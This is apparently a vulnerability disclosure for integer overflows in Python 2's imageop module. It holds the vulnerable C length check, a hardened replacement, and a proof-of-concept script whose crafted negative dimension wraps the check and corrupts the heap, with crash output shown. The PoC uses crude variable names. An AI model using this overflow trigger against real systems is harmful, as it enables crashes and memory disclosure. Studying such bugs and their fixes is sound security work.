The module imageop contains a lot of int overflows, which result in heap overflows and possibly memory disclosure.
The files imageop.c and rgbimgmodule.c are examples.

static PyObject *
imageop_tovideo(PyObject *self, PyObject *args)
{
    int maxx, maxy, x, y, len;

    ........................

    /* *************** int overflow here permits bypassing the len check ******************* */

    if ( maxx*maxy*width != len ) {
        PyErr_SetString(ImageopError, "String has incorrect length");
        return 0;
    }

    rv = PyString_FromStringAndSize(NULL, len);
    if ( rv == 0 )
        return 0;
    ncp = (unsigned char *)PyString_AsString(rv);

    if ( width == 1 ) {
        memcpy(ncp, cp, maxx);  /* Copy first line */
        ncp += maxx;

    /* ********** with a negative value it's possible to bypass the code ********** */

        for (y=1; y<maxy; y++) {  /* Interpolate other lines */

-----------------------------------------------------------------------------------------------------------------------------
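As an added example (not code from the bug report or from CPython), the original length check emulated with 32-bit wrapping arithmetic next to a hardened version that rejects non-positive dimensions and any product that overflows; the function names are assumed, and the argument order width, maxx, maxy follows the proof-of-concept call below.

```c
#include <stdint.h>
#include <limits.h>
#include <stdio.h>

/* Emulation of the original check `maxx*maxy*width != len` as it behaves on
 * a 32-bit int build: the product is formed with wrapping arithmetic (done on
 * uint32_t here, since signed overflow is undefined behaviour in C).
 * Returns 1 when the original code would have accepted the input. */
int vulnerable_length_check(int width, int maxx, int maxy, int len)
{
    uint32_t prod = (uint32_t)maxx * (uint32_t)maxy * (uint32_t)width;
    return (int32_t)prod == len;
}

/* Hardened check (an assumed replacement, not the original code): every
 * dimension must be positive, no intermediate product may overflow, and the
 * exact product must match len. Returns 1 when the input is accepted. */
int safe_length_check(int width, int maxx, int maxy, int len)
{
    if (width <= 0 || maxx <= 0 || maxy <= 0 || len <= 0)
        return 0;
    if (maxx > INT_MAX / maxy)          /* maxx * maxy would overflow */
        return 0;
    int area = maxx * maxy;
    if (area > INT_MAX / width)         /* area * width would overflow */
        return 0;
    return area * width == len;
}

int main(void)
{
    /* Values taken from the proof of concept on this page: width=1,
     * maxx=4461, maxy=-2147002257, and a 1603-byte input string. */
    int width = 1, maxx = 4461, maxy = -2147002257, len = 1603;

    printf("original check accepts: %d\n",
           vulnerable_length_check(width, maxx, maxy, len));  /* 1 */
    printf("hardened check accepts: %d\n",
           safe_length_check(width, maxx, maxy, len));        /* 0 */
    /* With the original check passing, the width==1 branch goes on to
     * memcpy(ncp, cp, maxx): 4461 bytes into a 1603-byte buffer. */
    return 0;
}
```

The wrapped product 4461 * -2147002257 * 1 is exactly 1603 modulo 2^32, which is why the proof of concept passes a 1603-byte string.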
An IA-32 (32-bit) proof of concept:
*****************************************************************
# Python 2 script (the imageop module only exists in Python 2)
import imageop

sexshit = "a"*1603
evil = "p"*5241
connard = "s"*2000

supaire= "45"*65
print supaire
connard = "cool"
salope = "suceuse"
# width=1, maxx=4461, maxy=-2147002257: the 32-bit product wraps to 1603,
# the length of the input string, so the length check passes
dtc = imageop.tovideo(sexshit,1,4461,-2147002257)
sexshit = "dtc"*52
print connard,supaire," fin de dump"
**********************************************************************

www@AtlanticDrive:~$ python sux.py
4545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545
cool 4545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545 fin de dump
*** glibc detected *** corrupted double-linked list: 0x0817d3f0 ***
Abandon
www@AtlanticDrive:~$

ok, I hate Python's syntax, that's too old school! :p